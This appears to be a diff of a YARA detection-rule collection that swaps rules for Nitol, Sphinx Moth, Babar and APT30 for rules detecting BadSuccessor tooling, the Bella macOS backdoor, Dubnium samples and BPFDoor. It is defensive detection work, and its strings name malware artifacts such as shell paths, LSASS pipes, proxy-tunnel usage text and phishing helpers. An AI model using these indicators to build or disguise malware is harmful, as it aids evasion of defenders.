-		logic_hash = "6e5c1c75a499434ad6ddd2439d28ac91d500b18418e693761d0b236bf6d6ce42"
-		score = 70
+		logic_hash = "42fe8a32022592ff976d6d2839d949e28f60c8958f64a20c1c3c9091fb64d31e"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "2b09a6811a9d0447f8c6480430eb0f7e3ff64fa933d0b2e8cd6117f38382cc6a"
+		hash2 = "d1cbf80786b1ca1ba2e5c31ec09159be276ad3d10fc0a8a0dbff229d8263ca0a"
+		hash3 = "ff17e9bcc1ed16985713405b95745e47674ec98e3c6c889df797600718a35b2c"
 
 	strings:
-		$s1 = "UserName=User-001" fullword ascii
-		$s2 = "Web=1" fullword ascii
-		$s3 = "Mail=1" fullword ascii
-		$s4 = "FTP=0" fullword ascii
-		$x1 = "IPAddressLow=78.109.194.114" fullword ascii
+		$xc1 = { 6C 6F 67 69 6E 3A 00 25 73 00 00 2F 62 69 6E 2F 73 68 00 2F 74 6D 70 2F 6C 6F 67 69 6E }
+		$s1 = "/tmp/login" ascii fullword
+		$s2 = "npxXoudifFeEgGaACSnmcs[" ascii fullword
+		$sc1 = { 28 6E 69 6C 29 00 00 00 28 6E 75 6C 6C 29 }
 
 	condition:
-		all of ( $s* ) or $x1
+		uint16( 0 ) == 0x457f and filesize < 500KB and ( 1 of ( $x* ) or 2 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Nitol_Malware_Jan19_1 : FILE
+rule SIGNATURE_BASE_HKTL_EXPL_WIN_PS1_Badsuccessor_May25 : FILE
 {
 	meta:
-		description = "Detects Nitol Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5b9968a8-31ba-593b-9e01-b69a4e31fe65"
-		date = "2019-01-14"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/shotgunner101/status/1084602413691166721"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mal_nitol.yar#L4-L31"
+		description = "Detects PowerShell tool called Get-BadSuccessorOUPermissions.ps1 that helps exploit a vulnerability in Active Directory. Lists every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions."
+		author = "Florian Roth"
+		id = "5bc135f2-dc7f-51e9-ba19-b63af64f0deb"
+		date = "2025-05-22"
+		modified = "2025-05-22"
+		reference = "https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_badsuccessor_helper_may25.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4607496beb37500637c1e5509b42c0fe6f9e79548c85603819dc966fa2cc2be0"
+		logic_hash = "a023bced4aec2b2c601088367766f42a3fcf36053c7eb92985cc7468c7cd6cb0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e"
 
 	strings:
-		$xc1 = { 00 25 75 20 25 73 00 00 00 30 2E 30 2E 30 2E 30
-               00 25 75 20 4D 42 00 00 00 25 64 2A 25 75 25 73
-               00 7E 4D 48 7A }
-		$xc2 = "GET ^&&%$%$^" ascii
-		$n1 = ".htmGET " ascii
-		$s1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
-		$s2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$s3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
-		$s4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$x1 = "function Get-BadSuccessorOUPermissions" ascii wide
+		$x2 = "\"0feb936f-47b3-49f2-9386-1dedc2c23765\"=\"msDS-DelegatedManagedServiceAccount\"" ascii wide
+		$x3 = "CreateChild|GenericAll|WriteDACL|WriteOwner" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "286870a926664a5129b8b68ed0d4a8eb" or 1 of ( $x* ) or #n1 > 4 or 4 of them )
+		filesize < 20MB and 1 of them
 }
-rule SIGNATURE_BASE_Saudi_Phish_Trojan : FILE
+rule SIGNATURE_BASE_OSX_Backdoor_Bella : FILE
 {
 	meta:
-		description = "Detects a trojan used in Saudi Aramco Phishing"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d805391d-1256-5dac-8585-ccf3391d4e91"
-		date = "2017-10-12"
+		description = "Bella MacOS/OSX backdoor"
+		author = "John Lambert @JohnLaTwC"
+		id = "d2a994f9-acff-5de4-8f70-453b5d4d7947"
+		date = "2018-02-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/Z3JUAA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_saudi_aramco_phish.yar#L10-L27"
+		reference = "https://twitter.com/JohnLaTwC/status/911998777182924801"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_osx_backdoor_bella.yar#L2-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f7199d2e408cc057d88234e4041c7d87652d1ed361eaaf75bb37da45900e9f38"
+		hash = "4288a81779a492b5b02bad6e90b2fa6212fa5f8ee87cc5ec9286ab523fc02446 cec7be2126d388707907b4f9d681121fd1e3ca9f828c029b02340ab1331a5524 e1cf136be50c4486ae8f5e408af80b90229f3027511b4beed69495a042af95be"
+		logic_hash = "c2fa72072decd850698fbaaa9c2a6687cdf64e6bac068ff52a97963053db4339"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ad94dc5d59aa1e9962c76fd5ca042e582566049a97aef9f5730ba779e5ebb91"
 
 	strings:
-		$s1 = { 7B 00 30 00 7D 00 7B 00 31 00 7D 00 5C 00 00 09
-               2E 00 64 00 6C 00 6C 00 00 11 77 00 33 00 77 00
-               70 00 2E 00 65 00 78 00 65 00 00 1B 61 00 73 00
-               70 00 6E 00 65 00 74 00 5F 00 77 00 70 00 2E 00
-               65 00 78 00 65 }
+		$h1 = "#!/usr/bin/env"
+		$s0 = "subprocess" fullword ascii
+		$s1 = "import sys" fullword ascii
+		$s2 = "shutil" fullword ascii
+		$p0 = "create_bella_helpers" fullword ascii
+		$p1 = "is_there_SUID_shell" fullword ascii
+		$p2 = "BELLA IS NOW RUNNING" fullword ascii
+		$p3 = "SELECT * FROM bella WHERE id" fullword ascii
+		$subpart1_a = "inject_payloads" fullword ascii
+		$subpart1_b = "check_if_payloads" fullword ascii
+		$subpart1_c = "updateDB" fullword ascii
+		$subpart2_a = "appleIDPhishHelp" fullword ascii
+		$subpart2_b = "appleIDPhish" fullword ascii
+		$subpart2_c = "iTunes" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
+		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 120KB and @s0 [ 1 ] < 100 and @s1 [ 1 ] < 100 and @s2 [ 1 ] < 100 and 1 of ( $p* ) or all of ( $subpart1_* ) or all of ( $subpart2_* )
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Cudacrt : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_1 : FILE
 {
 	meta:
-		description = "sphinx moth threat group file cudacrt.dll"
-		author = "Kudelski Security - Nagravision SA"
-		id = "233f657b-029a-5ed4-b2f7-712851297f18"
-		date = "2015-08-06"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "377ecbaa-9324-562e-a973-0276d44f3feb"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L9-L26"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae7ff3d5ffd29de80ce5dcccde9af04d2537a279fe35f6e94257d59a462ba6a0"
+		logic_hash = "94763f42dacbeede9a72c3ecc222164a5808bd74c5d2d783c76831221a9c30c8"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
 
 	strings:
-		$s0 = "HPSSOEx.dll" fullword wide
-		$s1 = "255.255.255.254" fullword wide
-		$s2 = "SOFTWARE\\SsoAuth\\Service" fullword wide
-		$op0 = { ff 15 5f de 00 00 48 8b f8 48 85 c0 75 0d 48 8b }
-		$op1 = { 45 33 c9 4c 8d 05 a7 07 00 00 33 d2 33 c9 ff 15 }
-		$op2 = { e8 7a 1c 00 00 83 f8 01 74 17 b9 03 }
+		$key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii
+		$key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 243KB and all of ( $s* ) and 1 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Sphinx_Moth_H2T : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_2 : FILE
 {
 	meta:
-		description = "sphinx moth threat group file h2t.dat"
-		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
-		id = "62d14efd-7d0b-5f66-9e78-74f3f9e2fd5b"
-		date = "2015-08-06"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "894dc893-25fc-5fdc-9f69-8085b94e1af1"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L28-L45"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L26-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7aca260d415de84cf432b18385db6a9768a036e3bd0a9aa8ded4a1bfcad26d0c"
+		logic_hash = "5b633a7e002609fa78b0de8fb818af1b47fbe77497d161b6b41602fb34780ca8"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
 
 	strings:
-		$x1 = "%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd]" fullword ascii
-		$s1 = "[-] Error in connection() %d - %s" fullword ascii
-		$s2 = "[-] Child process exit." fullword ascii
-		$s3 = "POST http://%s:%s/ HTTP/1.1" fullword ascii
-		$s4 = "pipe() to" fullword ascii
-		$s5 = "pipe() from" fullword ascii
+		$x1 = ":*:::D:\\:c:~:" fullword ascii
+		$s2 = "SPMUVR" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 156KB and ( $x1 or all of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Iastor32 : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_3 : FILE
 {
 	meta:
-		description = "sphinx moth threat group file iastor32.exe"
-		author = "Kudelski Security - Nagravision SA"
-		id = "5688c598-ea18-578f-bb8a-3729c0502af5"
-		date = "2015-08-06"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "66f66139-88df-5ba9-a3fc-ba4fc98ce3f9"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L47-L59"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L42-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "056949677654a88fb430c988939006dacfefdabbe12824936a01e5aabbb73441"
+		logic_hash = "851efb71cd80040fdd13d9961d1e0084421c783afc43417ff1ac3ed023a73ae1"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8"
+		hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5"
+		hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827"
 
 	strings:
-		$s0 = "MIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nN" fullword ascii
-		$s1 = "iAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z" fullword ascii
+		$x1 = "copy /y \"%s\" \"%s\" " fullword ascii
+		$x2 = "del /f \"%s\" " fullword ascii
+		$s1 = "del /f /ah \"%s\" " fullword ascii
+		$s2 = "if exist \"%s\" goto Rept " fullword ascii
+		$s3 = "\\*.*.lnk" ascii
+		$s4 = "Dropped" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of them
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Kerberos32 : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_5 : FILE
 {
 	meta:
-		description = "sphinx moth threat group file kerberos32.dll"
-		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
-		id = "769ee362-2363-511a-8f17-99e66c9bab53"
-		date = "2015-08-06"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "09c1aeee-9437-54e9-967f-3c2fcc0736ed"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L61-L85"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L64-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b672c9b9b0ffffd8f243832ea217bfc10b08026c71d297ee1047ca999fb829c"
+		logic_hash = "0f84f502ba9a4fe304851badfa98d9e8500cdef472d4358cfd327365ac04dda3"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+		hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
 
 	strings:
-		$x1 = "%WINDIR%\\ativpsrz.bin" fullword ascii
-		$x2 = "%WINDIR%\\ativpsrn.bin" fullword ascii
-		$x3 = "kerberos32.dll" fullword wide
-		$x4 = "KERBEROS64.dll" fullword ascii
-		$x5 = "kerberos%d.dll" fullword ascii
-		$s1 = "\\\\.\\pipe\\lsassp" fullword ascii
-		$s2 = "LSASS secure pipe" fullword ascii
-		$s3 = "NullSessionPipes" fullword ascii
-		$s4 = "getlog" fullword ascii
-		$s5 = "startlog" fullword ascii
-		$s6 = "stoplog" fullword ascii
-		$s7 = "Unsupported OS (%d)" fullword ascii
-		$s8 = "Unsupported OS (%s)" fullword ascii
+		$s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii
+		$s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Kerberos64 : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_6 : FILE
 {
 	meta:
-		description = "sphinx moth threat group file kerberos64.dll"
-		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
-		id = "5a2487e4-cda4-5d45-9351-edd2b69c460a"
-		date = "2015-08-06"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "43366f1a-784d-515e-a8e9-3e924f2abfd8"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L87-L104"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L89-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "13aeb72fcd0f5fd6e73464a90787c756c50569f9eae48945e4ff90d8f9073585"
+		logic_hash = "3425734b3259ebd5390cf16d2e394a4cc735dc3fc9fcc627b46bcc77729e465e"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
 
 	strings:
-		$s0 = "KERBEROS64.dll" fullword ascii
-		$s1 = "zeSecurityDescriptor" fullword ascii
-		$s2 = "SpGetInfo" fullword ascii
-		$s3 = "SpShutdown" fullword ascii
-		$op0 = { 75 05 e8 6a c7 ff ff 48 8b 1d 47 d6 00 00 33 ff }
-		$op1 = { 48 89 05 0c 2b 01 00 c7 05 e2 29 01 00 09 04 00 }
-		$op2 = { 48 8d 3d e3 ee 00 00 ba 58 }
+		$s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii
+		$s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii
+		$s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 406KB and all of ( $s* ) and 1 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Nvcplex : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_7 : FILE
 {
 	meta:
-		description = "sphinx moth threat group file nvcplex.dat"
-		author = "Kudelski Security - Nagravision SA"
-		id = "dd1b4071-adf5-5d54-9b4c-877f0965bdc7"
-		date = "2015-08-06"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6712bd5f-6bbc-5ca0-9fc7-b2013b8f8147"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L106-L120"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L109-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2f851c0ab8c4a426b00addfbe0da7ceebb08e93014efcb11d64247d14fec909b"
+		logic_hash = "76cf4acee025fcae1dec975a124f4bf808f1f09f99f7fa6a4e965febd6a89e3a"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
 
 	strings:
-		$s0 = "mshtaex.exe" fullword wide
-		$op0 = { 41 8b cc 44 89 6c 24 28 48 89 7c 24 20 ff 15 d3 }
-		$op1 = { 48 3b 0d ad 8f 00 00 74 05 e8 ba f5 ff ff 48 8b }
-		$op2 = { 8b ce e8 49 47 00 00 90 8b 43 04 89 05 93 f1 00 }
+		$s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii
+		$s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 214KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
 }
-rule SIGNATURE_BASE_SNOWGLOBE_Babar_Malware : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_Sshopenssl : FILE
 {
 	meta:
-		description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
+		description = "Detects sample mentioned in the Dubnium Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "53a61065-a3b3-563e-8ecc-513d8da68085"
-		date = "2015-02-18"
+		id = "d4f2b494-47b6-5b8e-b358-30159dfb977b"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snowglobe_babar.yar#L4-L37"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dubnium.yar#L133-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
-		logic_hash = "a93425a95efe471b815e2daf0b5e290b3472b722c6a48f8c22f0a6e9c588ffc9"
-		score = 80
+		logic_hash = "5cad6b0785e8c9627f1b9678dc6206cf36cd33ead2283f77655fdb0ea36249e9"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
 
 	strings:
-		$z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
-		$z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
-		$z2 = "ExecQueryFailled!" fullword ascii
-		$z3 = "NBOT_COMMAND_LINE" fullword
-		$z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
-		$s1 = "/s /n %s \"%s\"" fullword ascii
-		$s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
-		$s3 = "/c start /wait " fullword ascii
-		$s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
-		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" ascii
-		$x2 = "%COMMON_APPDATA%" fullword ascii
-		$x4 = "CONOUT$" fullword ascii
-		$x5 = "cmd.exe" fullword ascii
-		$x6 = "DLLPATH" fullword ascii
+		$s1 = "sshkeypairgen.exe" fullword wide
+		$s2 = "OpenSSL: FATAL" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1MB and ( ( 1 of ( $z* ) and 1 of ( $x* ) ) or ( 3 of ( $s* ) and 4 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
 }
-rule SIGNATURE_BASE_APT30_Generic_H : FILE
+rule SIGNATURE_BASE_MAL_LNX_Redmenshen_Bpfdoor_May23_1 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1908e985-9634-51dc-8972-53afa13c26a3"
-		date = "2015-04-13"
+		description = "Detects BPFDoor malware"
+		author = "Florian Roth"
+		id = "25df4dba-ec6e-5999-b6be-56fe933cb0d0"
+		date = "2023-05-11"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L10-L26"
+		reference = "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L3-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4affe7dc01efc4d6c25aaae4679bc1f8fddd97794e351d30501eaeb8e1d1dea"
-		score = 75
+		logic_hash = "c58971a43443800256e791b4f9fe7c3221518b0050e5f2964b6c843ddb4549ac"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a4c8752f3e7fde0139421b8d5713b29c720685d"
-		hash2 = "4350e906d590dca5fcc90ed3215467524e0a4e3d"
+		hash1 = "afa8a32ec29a31f152ba20a30eb483520fe50f2dce6c9aa9135d88f7c9c511d7"
 
 	strings:
-		$s0 = "\\Temp1020.txt" ascii
-		$s1 = "Xmd.Txe" fullword ascii
